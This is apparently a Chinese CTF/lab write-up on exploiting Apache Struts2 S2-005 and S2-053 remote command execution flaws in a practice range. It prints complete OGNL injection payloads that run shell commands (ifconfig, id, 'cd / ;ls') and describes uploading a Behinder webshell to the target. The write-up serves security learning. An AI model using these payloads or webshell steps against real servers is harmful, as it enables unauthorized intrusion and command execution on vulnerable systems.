【web攻防】安鸾靶场开发框架Struct2远程命令执行 Struct2-S2-005/S2-053远程代码执行漏洞 靶场实战+学习记录

中华人民共和国网络安全法(出版物)_360百科 

 

首先简单介绍一下 S2-005 的含义，为Struct2框架发现的第5个漏洞，依次类推S2-053 为struct2框架发现的第53个漏洞，当然这些漏洞危害有大有小，本次需要利用的则是具有很大危害的RCE远程命令执行漏洞。

struct2 远程命令执行01

工具 K8struct2 EXP（Github找）冰蝎

漏洞简述

S2-005和S2-003的原理是类似的，因为官方在修补S2-003不全面，导致用户可以绕过官方的安全配置（禁止静态方法调用和类方法执行），再次造成的漏洞，可以说是升级版的S2-005是升级版的S2-003。

 

POC （暂时没使用成功）

('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003dfalse')(bla)(bla)&('\u0023_memberAccess.allowStaticMethodAccess\u003dtrue')(bla)(bla)&('\u0023_memberAccess.excludeProperties\u003d@java.util.Collections@EMPTY_SET')(kxlzx)(kxlzx)&('\u0023mycmd\u003d\'ifconfig\'')(bla)(bla)&('\u0023myret\u003d@java.lang.Runtime@getRuntime().exec(\u0023mycmd)')(bla)(bla)&(A)(('\u0023mydat\u003dnew\40java.io.DataInputStream(\u0023myret.getInputStream())')(bla))&(B)(('\u0023myres\u003dnew\40byte[51020]')(bla))&(C)(('\u0023mydat.readFully(\u0023myres)')(bla))&(D)(('\u0023mystr\u003dnew\40java.lang.String(\u0023myres)')(bla))&('\u0023myout\u003d@org.apache.struts2.ServletActionContext@getResponse()')(bla)(bla)&(E)(('\u0023myout.getWriter().println(\u0023mystr)')(bla))

 

账号密码，随便输入一个，进入到提示错误页面。

k8工具连接

 上传冰蝎自带马

 冰蝎连接

 Struct2远程命令执行02

工具 hackbar

漏洞简述

Struts2在使用Freemarker模板引擎的时候，同时允许解析OGNL表达式。导致用户输入的数据本身不会被OGNL解析，但由于被Freemarker解析一次后变成离开一个表达式，被OGNL解析第二次，导致任意命令执行漏洞。

漏洞地址

http://106.15.50.112:8027/hello.action

漏洞POC

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

 

 通过题目可知漏洞在根目录 所以我们需要一些linux操作获取flag

首先，我们处于的位置并不在根目录，所以我们用 cd /  去到根目录，但是在下一次命令执行的时候位置并不会在根目录，所以这里用 ；拼接命令 ls

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cd / ;ls').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

 后面用cat 命令打开flag文件就行了

参考链接

Struts2-005远程代码执行漏洞分析 - FreeBuf网络安全行业门户

Struts2著名RCE漏洞引发的十年之思 - FreeBuf网络安全行业门户

史上最全Struts 2 漏洞复现合集（下） - FreeBuf网络安全行业门户

ognl 详解_zzjjiandan的专栏-CSDN博客_ognl 

---

作者水平有限，有任何不当之处欢迎指正。

本文目的是为了传播web安全原理知识，提高相关人员的安全意识，任何利用本文提到的技术与工具造成的违法行为，后果自负！ 

日站不规范，亲人两行泪！